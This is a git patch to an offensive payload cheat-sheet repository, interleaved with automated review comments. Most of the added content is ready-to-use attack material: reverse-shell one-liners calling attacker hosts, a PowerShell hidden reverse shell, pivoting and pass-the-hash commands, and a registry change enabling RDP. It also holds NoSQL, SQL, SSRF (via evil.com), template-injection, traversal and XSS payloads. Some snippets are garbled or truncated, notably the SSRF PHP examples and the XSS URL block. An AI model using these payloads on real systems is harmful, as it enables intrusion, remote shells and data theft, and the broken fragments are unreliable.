From b87c3fd7ff3757631928b1dce4646df7f3f0e833 Mon Sep 17 00:00:00 2001 From: Swissky Date: Thu, 15 Feb 2018 23:27:42 +0100 Subject: [PATCH] Traversal Dir + NoSQL major updates + small addons --- .../Linux - Reverse Shell Cheatsheet.md | 62 ++++++++++- .../Network Pivoting Techniques.md | 100 ++++++++++++++++++ .../Windows - Using credentials.md | 4 + NoSQL injection/README.md | 43 +++++++- SQL injection/MySQL Injection.md | 6 ++ SSRF injection/README.md | 39 +++++++ Server Side Template injections/README.md | 45 ++++++-- Traversal directory/README.md | 29 ++++- XSS injection/README.md | 35 +++++- 9 files changed, 342 insertions(+), 21 deletions(-) create mode 100644 Methodology and Resources/Network Pivoting Techniques.md diff --git a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md b/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md index c14967d3..78769a37 100644 --- a/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md +++ b/Methodology and Resources/Linux - Reverse Shell Cheatsheet.md @@ -2,15 +2,32 @@ ## Reverse Shell Cheat Sheet -Bash +Bash TCP ```bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 + 0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196 ``` +Bash UDP +``` +Victim: +sh -i >& /dev/udp/127.0.0.1/4242 0>&1 + +Listener: +nc -u -lvp 4242 +``` + + Perl ```perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' + +perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' + + +NOTE: Windows only +perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"[IPADDR]:[PORT]");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' ``` Python 
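Review bot: The second `Bash TCP` line, `0<&196;exec 196<>/dev/tcp//; sh <&196 >&196 2>&196`, has nothing between the slashes where the host and port belong, so as written `/dev/tcp//` cannot be opened; the placeholders look to have been lost in transcription. `0<&196;exec 196<>/dev/tcp/[IPADDR]/[PORT]; sh <&196 >&196 2>&196` would follow the `[IPADDR]`/`[PORT]` convention the same hunk adopts for the new Perl lines, whereas the line above it still uses the literal `10.0.0.1/8080`; the same mix of literals and placeholders recurs in the Ruby/Netcat hunk below. The new `Bash UDP` fence also carries no language tag while its neighbours are tagged `bash`.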
@@ -26,12 +43,21 @@ php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' Ruby ```ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' + +ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' + +NOTE: Windows only +ruby -rsocket -e 'c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end' ``` -Netcat +Netcat Traditional +```bash +nc -e /bin/sh [IPADDR] [PORT] +``` + +Netcat OpenBsd ```bash -nc -e /bin/sh 10.0.0.1 1234 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f ``` @@ -41,6 +67,11 @@ ncat 127.0.0.1 4444 -e /bin/bash ncat --udp 127.0.0.1 4444 -e /bin/bash ``` +Powershell +```powershell +powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() +``` + Java ```java r = Runtime.getRuntime() 
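Review bot: `Netcat OpenBsd` in the new heading misspells the project name; it should read `Netcat OpenBSD`. The `mkfifo` line kept under that heading also still uses the literal `10.0.0.1 1234` while the `Netcat Traditional` block introduced right above it uses `[IPADDR] [PORT]`; one placeholder convention for the pair would read better.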
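Review bot: In the new `Powershell` block the `New-Object System.Net.Sockets.TCPClient("[IPADDR]",[PORT])` expression is never assigned, yet the rest of the line reads `$client.GetStream()` and `$client.Close()`, so `$client` is undefined and the snippet fails at its first use; this looks like a transcription slip and the object should be bound as `$client = New-Object System.Net.Sockets.TCPClient(...)` before it is used. The heading is also spelled `Powershell`; the product name is `PowerShell`.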
@@ -64,7 +95,32 @@ NodeJS })(); ``` +## Spawn TTY +``` +/bin/sh -i +``` + +(From an interpreter) +``` +python -c 'import pty; pty.spawn("/bin/sh")' +perl -e 'exec "/bin/sh";' +perl: exec "/bin/sh"; +ruby: exec "/bin/sh" +lua: os.execute('/bin/sh') +``` + +(From within vi) +``` +:!bash +:set shell=/bin/bash:shell +``` + +(From within nmap) +``` +!sh +``` ## Thanks to * [Reverse Bash Shell One Liner](https://security.stackexchange.com/questions/166643/reverse-bash-shell-one-liner) * [Pentest Monkey - Cheat Sheet Reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet) +* [Spawning a TTY Shell](http://netsec.ws/?p=337) diff --git a/Methodology and Resources/Network Pivoting Techniques.md b/Methodology and Resources/Network Pivoting Techniques.md new file mode 100644 index 00000000..b0e45ead --- /dev/null +++ b/Methodology and Resources/Network Pivoting Techniques.md 
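Review bot: The new `## Spawn TTY` section's first entry, `/bin/sh -i`, does not allocate a TTY — it only starts an interactive shell — and the `(From an interpreter)` block mixes shell one-liners (`python -c …`, `perl -e …`) with statements typed inside an already running interpreter (`perl: exec "/bin/sh";`, `ruby: exec "/bin/sh"`, `lua: os.execute('/bin/sh')`) without saying which is which. A short lead-in such as `# from a shell:` before the one-liners and `# from inside the interpreter (language: statement):` before the others would make the block self-explanatory; of the entries shown, only `python -c 'import pty; pty.spawn("/bin/sh")'` actually spawns a pty. The closing fence of the nmap block is followed directly by `## Thanks to` with no blank line, unlike the rest of the file.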
@@ -0,0 +1,100 @@
+# Network Pivoting Techniques
+
+## SSH
+
+### SOCKS Proxy
+```
+ssh -D8080 [user]@[host]
+
+ssh -N -f -D 9000 [user]@[host]
+-f : ssh in background
+-N : do not execute a remote command
+```
+
+### Local Port Forwarding
+```
+ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]
+```
+
+
+### Remote Port Forwarding
+```
+ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]
+```
+
+## Proxychains
+**Config file**: /etc/proxychains.conf
+```bash
+[ProxyList]
+socks4 localhost 8080
+```
+Set the SOCKS4 proxy then `proxychains nmap 192.168.5.6`
+
+## Web SOCKS - reGeorg
+```
+python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp
+```
+
+## Rpivot
+
+Server (Attacker box)
+```python
+python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0
+```
+
+Client (Compromised box)
+```python
+python client.py --server-ip --server-port 9443
+```
+
+Through corporate proxy
+```python
+python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
+--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e
+```
+
+Passing the hash
+```python
+python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
+--ntlm-proxy-port 8080 --domain CORP --username jdoe \
+--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE
+```
+
+
+## Basic Pivoting Types
+| Type | Use Case |
+| :------------- | :------------------------------------------ |
+| Listen - Listen | Exposed asset, may not want to connect out. |
+| Listen - Connect | Normal redirect. 
| +| Connect - Connect | Can’t bind, so connect to bridge two hosts | + + +## Listen - Listen +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -v -l -p 8080 -c "ncat -v -l -p 9090"`| +| socat | `socat -v tcp-listen:8080 tcp-listen:9090` | +| remote host 1 | `ncat localhost 8080 < file` | +| remote host 2 | `ncat localhost 9090 > newfile` | + + +## Listen - Connect +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat -l -v -p 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat localhost -p 8080 < file` | +| remote host 2 | `ncat -l -p 9090 > newfile` | + + +## Connect - Connect +| Type | Use Case | +| :------------- | :------------------------------------------ | +| ncat | `ncat localhost 8080 -c "ncat localhost 9090"` | +| socat | `socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090` | +| remote host 1 | `ncat -l -p 8080 < file | +| remote host 2 | `ncat -l -p 9090 > newfile` | + + +## Thanks to + * [Network Pivoting Techniques - Bit rot](https://bitrot.sh/cheatsheet/14-12-2017-pivoting/) diff --git a/Methodology and Resources/Windows - Using credentials.md b/Methodology and Resources/Windows - Using credentials.md index 5c92e8e9..3e1850b0 100644 --- a/Methodology and Resources/Windows - Using credentials.md +++ b/Methodology and Resources/Windows - Using credentials.md @@ -47,6 +47,10 @@ python wmiexec.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 python rdpcheck.py CSCOU/jarrieta:nastyCutt3r@10.9.122.5 rdesktop -d CSCOU -u jarrieta -p nastyCutt3r 10.9.122.5 ``` +Note: you may need to enable it with the following command +``` +reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x00000000 /f +``` ## Netuse (Windows) ``` 
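Review bot: In the new `Connect - Connect` table the `remote host 1` cell opens a backtick that is never closed (`` `ncat -l -p 8080 < file | ``), which breaks rendering of that row and the one after it; it should end `` < file` | `` like the matching rows in the two tables above. In the Rpivot `Client (Compromised box)` example, `python client.py --server-ip --server-port 9443` has no value after `--server-ip`; presumably the `[server ip]` placeholder used in the next two examples was dropped. The Rpivot fences are tagged `python` but hold shell command lines, so `bash` (or no tag, as the SSH blocks do) would be the accurate choice.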
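Review bot: `Note: you may need to enable it with the following command` leaves `it` unresolved; the block it follows is the RDP example, so `enable Remote Desktop (set fDenyTSConnections to 0)` would make the sentence self-contained. It would also be accurate to say in the same note that the `reg add` line is a persistent host configuration change rather than something scoped to the session, and one that host-based monitoring commonly records.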
diff --git a/NoSQL injection/README.md b/NoSQL injection/README.md index d7e156a3..9b3ac209 100644 --- a/NoSQL injection/README.md +++ b/NoSQL injection/README.md @@ -3,9 +3,16 @@ NoSQL databases provide looser consistency restrictions than traditional SQL dat ## Exploit -Basic authentication bypass using not equal ($ne) +Basic authentication bypass using not equal ($ne) or greater ($gt) ``` +in URL username[$ne]=toto&password[$ne]=toto + +in JSON +{"username": {"$ne": null}, "password": {"$ne": null} } +{"username": {"$ne": "foo"}, "password": {"$ne": "bar"} } +{"username": {"$gt": undefined}, "password": {"$gt": undefined} } + ``` Extract length information @@ -16,12 +23,39 @@ username[$ne]=toto&password[$regex]=.{3} Extract data information ``` +in URL username[$ne]=toto&password[$regex]=m.{2} username[$ne]=toto&password[$regex]=md.{1} username[$ne]=toto&password[$regex]=mdp username[$ne]=toto&password[$regex]=m.* username[$ne]=toto&password[$regex]=md.* + +in JSON +{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }} +{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }} +``` + +## Blind NoSQL +```python +import requests +import urllib3 +import string +import urllib +urllib3.disable_warnings() + +username="admin" +password="" + +while True: + for c in string.printable: + if c not in ['*','+','.','?','|']: + payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c) + r = requests.post(u, data = {'ids': payload}, verify = False) + if 'OK' in r.text: + print("Found one more char : %s" % (password+c)) + password += c ``` ## MongoDB Payloads 
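Review bot: The third `in JSON` example, `{"username": {"$gt": undefined}, "password": {"$gt": undefined} }`, is not valid JSON — `undefined` is a JavaScript value and a JSON parser rejects it — so under the `in JSON` label it cannot be sent as a request body as shown. Either drop it or label it as a JavaScript object literal so readers do not try to submit it as JSON. A one-line remediation pointer would also round out the section: the bypass exists only because the server forwards user-controlled objects as query operators, so rejecting non-string credentials (or `$`-prefixed keys) closes it.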
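Review bot: The new `Blind NoSQL` script calls `requests.post(u, …)` but never defines `u`, so it stops with a `NameError` on the first iteration; a clearly marked assignment such as `u = "http://[TARGET]/login"  # placeholder` next to `username`/`password` is needed. `import urllib` is unused and can go. `while True` also has no exit: once no printable character extends the prefix the loop spins forever, so a `break` when the inner `for` completes without a match (a `for … else:` clause) is required for the script to terminate.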
@@ -47,6 +81,7 @@ db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emi ## Thanks to -* https://www.dailysecurity.fr/nosql-injections-classique-blind/ -* https://www.owasp.org/index.php/Testing_for_NoSQL_injection -* https://github.com/cr0hn/nosqlinjection_wordlists + * https://www.dailysecurity.fr/nosql-injections-classique-blind/ + * https://www.owasp.org/index.php/Testing_for_NoSQL_injection + * https://github.com/cr0hn/nosqlinjection_wordlists + * https://zanon.io/posts/nosql-injection-in-mongodb diff --git a/SQL injection/MySQL Injection.md b/SQL injection/MySQL Injection.md index 824bac1d..39f42f6d 100644 --- a/SQL injection/MySQL Injection.md +++ b/SQL injection/MySQL Injection.md @@ -33,6 +33,12 @@ AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) AND updatexml(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)),null)-- ``` +Shorter to read: +``` +' and updatexml(null,concat(0x0a,version()),null)-- - +' and updatexml(null,concat(0x0a,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1)),null)-- - +``` + ## MYSQL Error Based - Extractvalue function ``` AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- diff --git a/SSRF injection/README.md b/SSRF injection/README.md index 42117709..471f98d1 100644 --- a/SSRF injection/README.md +++ b/SSRF injection/README.md @@ -35,6 +35,12 @@ Using this vulnerability users can upload images from any image URL = trigger an ``` ## Bypassing filters +Bypass using HTTPS +``` +https://127.0.0.1/ +https://localhost/ +``` + Bypass localhost with [::] ``` http://[::]:80/ @@ -53,6 +59,7 @@ http://0000::1:3128/ Squid Bypass localhost with a domain redirecting to locahost ``` +http://localtest.me http://n-pn.info ``` 
@@ -144,6 +151,37 @@ You didn't say the magic word ! QUIT ``` +Gopher:// SMTP - Back connect to 1337 +```php +Content of evil.com/redirect.php: + + +Now query it. +https://example.com/?q=http://evil.com/redirect.php. +``` +Gopher:// SMTP - send a mail +```php +Content of evil.com/redirect.php: +', + 'RCPT To: ', + 'DATA', + 'Subject: @sxcurity!', + 'Corben was here, woot woot!', + '.' + ); + + $payload = implode('%0A', $commands); + + header('Location: gopher://0:25/_'.$payload); +?> +``` + + ## SSRF on AWS Bucket Interesting path to look for at http://169.254.169.254 ``` @@ -191,3 +229,4 @@ http://0251.00376.000251.0000376/ Dotted octal with padding * [Les Server Side Request Forgery : Comment contourner un pare-feu - @Geluchat](https://www.dailysecurity.fr/server-side-request-forgery/) * [AppSecEU15 Server side browsing considered harmful - @Agarri](http://www.agarri.fr/docs/AppSecEU15-Server_side_browsing_considered_harmful.pdf) * [Enclosed alphanumerics - @EdOverflow](https://twitter.com/EdOverflow) +* [Hacking the Hackers: Leveraging an SSRF in HackerTarget - @sxcurity](http://www.sxcurity.pro/2017/12/17/hackertarget/) diff --git a/Server Side Template injections/README.md b/Server Side Template injections/README.md index 9e0ef394..639974b1 100644 --- a/Server Side Template injections/README.md +++ b/Server Side Template injections/README.md 
@@ -2,19 +2,47 @@ Template injection allows an attacker to include template code into an existant (or not) template. +## Ruby +#### Basic injection +```python +<%= 7 * 7 %> +``` + +#### Retrieve /etc/passwd +```python +<%= File.open('/etc/passwd').read %> +``` + + +## Java +#### Basic injection +```java +${{7*7}} +``` + +#### Retrieve the system’s environment variables. +```java +${T(java.lang.System).getenv()} +``` + +#### Retrieve /etc/passwd +```java +${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(32)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(101)).concat(T(java.lang.Character).toString(116)).concat(T(java.lang.Character).toString(99)).concat(T(java.lang.Character).toString(47)).concat(T(java.lang.Character).toString(112)).concat(T(java.lang.Character).toString(97)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(115)).concat(T(java.lang.Character).toString(119)).concat(T(java.lang.Character).toString(100))).getInputStream())} +``` + ## Jinja2 [Official website](http://jinja.pocoo.org/) > Jinja2 is a full featured template engine for Python. It has full unicode support, an optional integrated sandboxed execution environment, widely used and BSD licensed. -Basic injection -``` +#### Basic injection +```python {{4*4}}[[5*5]] ``` Jinja2 is used by Python Web Frameworks such as Django or Flask. The above injections have been tested on Flask application. #### Template format -``` +```python {% extends "layout.html" %} {% block body %}
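Review bot: The two new Ruby fences are tagged `python` although they hold ERB (`<%= 7 * 7 %>`); `ruby` (or `erb`) is the accurate tag. The `## Java` payloads use the SpEL type operator (`T(java.lang.System)`, `T(org.apache.commons.io.IOUtils)`) and the source credited below is a Spring SSTI write-up, so `## Java (Spring / SpEL)` would be the accurate heading — other Java template engines use different syntax. The long `/etc/passwd` payload would also benefit from a one-line comment saying that the `T(java.lang.Character).toString(n).concat(…)` chain only spells out the command `cat /etc/passwd` one character at a time to avoid string quotes, which is not obvious from the line itself.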
    @@ -27,7 +55,7 @@ The above injections have been tested on Flask application. ``` #### Dump all used classes -``` +```python {{ ''.__class__.__mro__[2].__subclasses__() }} ``` @@ -40,7 +68,7 @@ The above injections have been tested on Flask application. ``` #### Read remote file -``` +```python # ''.__class__.__mro__[2].__subclasses__()[40] = File class {{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }} ``` @@ -62,8 +90,9 @@ Inject this template {{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host ``` -#### Ressources & Sources -[https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) - +## Thanks to + * [https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/](https://nvisium.com/blog/2016/03/11/exploring-ssti-in-flask-jinja2-part-ii/) + * [Yahoo! RCE via Spring Engine SSTI](https://hawkinsecurity.com/2017/12/13/rce-via-spring-engine-ssti/) + * [Ruby ERB Template injection - TrustedSec](https://www.trustedsec.com/2017/09/rubyerb-template-injection/) #### Training [https://w3challs.com/](https://w3challs.com/) diff --git a/Traversal directory/README.md b/Traversal directory/README.md index fa53d197..f73742b8 100644 --- a/Traversal directory/README.md +++ b/Traversal directory/README.md @@ -1,8 +1,8 @@ # Traversal Directory -A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. +A directory traversal consists in exploiting insufficient security validation / sanitization of user-supplied input file names, so that characters representing "traverse to parent directory" are passed through to the file APIs. ## Exploit - +Basic ``` ../ ..\ 
@@ -16,5 +16,28 @@ A directory traversal consists in exploiting insufficient security validation / ...\.\ ``` +16 bit Unicode encoding +``` +. = %u002e +/ = %u2215 +\ = %u2216 +``` + +Double URL encoding +``` +. = %252e +/ = %252f +\ = %255c +``` + +UTF-8 Unicode encoding +``` +. = %c0%2e, %e0%40%ae, %c0ae +/ = %c0%af, %e0%80%af, %c0%2f +\ = %c0%5c, %c0%80%5c +``` + + + ## Thanks to -* \ No newline at end of file + * https://twitter.com/huykha10/status/962419695470174208 diff --git a/XSS injection/README.md b/XSS injection/README.md index f691e181..1325bc67 100644 --- a/XSS injection/README.md +++ b/XSS injection/README.md @@ -100,6 +100,7 @@ io.swf?yid=\"));}catch(e){alert(1);}// video-js.swf?readyFunction=alert%28document.domain%2b'%20XSSed!'%29 bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4 flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// +phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` XSS in Hidden input @@ -113,6 +114,20 @@ DOM XSS #"> ``` +XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic) +``` +-(confirm)(document.domain)// +; alert(1);// +``` + +XSS URL +``` +URL/ +URL/al @@ -638,6 +655,18 @@ Exotic payloads ``` +## More fun ? +This section will be used for the "fun/interesting/useless" stuff. + +Use notification box instead of an alert - by [@brutelogic](https://twitter.com/brutelogic) +Note : it requires user permission +``` +Notification.requestPermission(x=>{new(Notification)(1)}) + +Try here : https://brutelogic.com.br/xss.php?c3=%27;Notification.requestPermission(x=>%7Bnew(Notification)(1)%7D)// +``` + + ## Thanks to * https://github.com/0xsobky/HackVault/wiki/Unleashing-an-Ultimate-XSS-Polyglot * tbm
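Review bot: The added `phpmyadmin/js/canvg/flashcanvas.swf?id=test\”))…` line uses a Unicode right double quotation mark (`”`) where the `flashcanvas.swf` line directly above it uses `\"`; as written the payload carries the wrong character, so it should read `…?id=test\"));}catch(e){alert(document.domain)}//` like its sibling.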
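Review bot: The new heading `XSS in JS Context (payload without quote/double quote from [@brutelogic](https://twitter.com/brutelogic)` opens a parenthesis it never closes; add `)` after the link. The `XSS URL` block beneath it appears truncated in this view (`URL/` and `URL/al` with nothing after them), which suggests the payload text was lost in extraction rather than committed that way, but it is worth re-checking the file.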